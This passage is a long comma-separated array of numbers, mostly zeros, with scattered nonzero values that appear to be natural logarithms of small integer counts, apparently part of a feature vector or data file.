0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 2.4849066497880004, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.6931471805599453, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.281419193361606, 0.0, 6.802394763324311,\n 0.0, 0.0, 5.375278407684165, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.7412592803704001, 0.0,\n 0, 0.6931471805599453, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.302585092994046, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0, 1.9459101490553132, 1.791759469228055, 0, 0.0, 0.0, \n 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 3.58351893845611, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0,\n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 2.3978952727983707, 0, 0.0, 0.0, 0.0, 0, \n 0.6931471805599453, 0.6931471805599453, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0.0, 0.0, 0.0, 0, 0, 2.772588722239781, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.1972245773362196, 0.0, 0.0, 0.0, 2.833213344056216, 0, \n 1.6094379124341003, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 3.2188758248682006, 0.0, 0.0, 0.0, 3.9384838577066197, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, \n 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 3.58351893845611, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.189654742026425, 0.0, 0.0, \n 3.258096538021482, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.6931471805599453, 0.0, 0, 0.0, 2.6390573296152584, 0.0, 0.0, 0, 0.0, \n 5.8066078281957605, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0, 2.4849066497880004, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 2.550898738446989, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 1.3862943611198906, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 5.545177444479562, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.1972245773362196, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 4.1588830833596715, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.6094379124341003, 0, \n 3.4825185607408002, 2.5649493574615367, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 5.101797476893978, 0.0, 0, 0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.9444389791664403, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 1.0986122886681098, 0.0, 3.800574088041945, 0.0, 0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.791759469228055, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 2.833213344056216, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, \n 0.0, 0.0, 4.442651256490317, 0, 0.0, 2.302585092994046, 0.0, \n 5.723585101952381, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 7.275172319452771, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 5.952096120109145, 0.0, 0.0, 0.0, 0.0, \n 2.0794415416798357, 0, 